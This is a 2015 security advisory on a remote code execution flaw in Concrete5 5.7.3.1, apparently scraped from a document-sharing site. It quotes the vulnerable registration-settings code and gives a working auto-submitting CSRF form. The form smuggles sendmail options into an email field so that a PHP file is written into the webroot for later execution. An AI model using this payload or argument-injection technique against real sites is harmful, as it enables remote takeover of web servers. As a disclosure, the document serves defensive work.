Академический Документы
Профессиональный Документы
Культура Документы
Execution Vulnerability in
Concrete5 version 5.7.3.1
Author: Egidio Romano
Edition: 1.0
Last Edit: 04/05/2015
Cassification: Not restricted
Description
Concrete5 is vulnerable to a Remote Code Execution because it fails to properly validate
certain user input used as sender email address when sending out a registration
notification email. This vulnerability is mitigated by the fact that it can be exploited only
by authenticated administrator users (even though it could be exploited via a Cross Site
Request Forgery attack as well) and only if the email is being sent with sendmail.
Vulnerability Details
The vulnerable code is located within the Open::update_registration_type() method:
File: /concrete/controllers/single_page/dashboard/system/registration/open.php (lines 13-53):
if ($this->isPost()) {
Config::save('concrete.user.registration.email_registration', ($this>post('email_as_username') ? true : false));
Config::save('concrete.user.registration.type', $this>post('registration_type'));
Config::save('concrete.user.registration.captcha', ($this>post('enable_registration_captcha')) ? true : false);
switch ($this->post('registration_type')) {
case "enabled":
Config::save('concrete.user.registration.enabled', true);
Config::save('concrete.user.registration.validate_email', false);
Config::save('concrete.user.registration.approval', false);
Config::save('concrete.user.registration.notification', $this>post('register_notification'));
Config::save(
'concrete.user.registration.notification_email',
Loader::helper('security')->sanitizeString(
$this->post('register_notification_email')));
Date: 04/05/2015
Page 1/3
Exploitation Details
An attacker can leverage a CSRF vulnerability related to the Public Registration Settings to
force an authenticated administrator user into browsing to a web page like this:
<html>
<body>
<form method="POST"
action="http://[host]/index.php/dashboard/system/registration/open/update_registration_typ
e">
<input type="hidden" name="registration_type" value="enabled">
<input type="hidden" name="register_notification" value="1">
<input type="hidden" name="register_notification_email" value="a@b.com OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php">
<input type="hidden" name="ccm-submit-registration-type-form" value="Save">
</form><script>document.forms[0].submit()</script>
</body>
</html>
When the victim user will browse to this page, the Public Registration Settings will be
modified in a way that when a new user will be registered the following command line
will be executed to send out a notification email (in case sendmail is used):
/usr/sbin/sendmail -t i f a@b.com -OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php
This will log all the email traffic into a test.php file located within the /updates/ directory
of the Concrete5 webroot (which should be writable by the user running the web server).
So the next step for the attacker is to register a new account and put some malicious PHP
code after the email address, something like this:
Edition: v1.0
Not restricted
Date: 04/05/2015
Page 2/3
When the new account will be created a notification email will be sent, thus the attacker
can browse to http://[host]/updates/test.php in order to execute the injected PHP code:
Edition: v1.0
Not restricted
Date: 04/05/2015
Page 3/3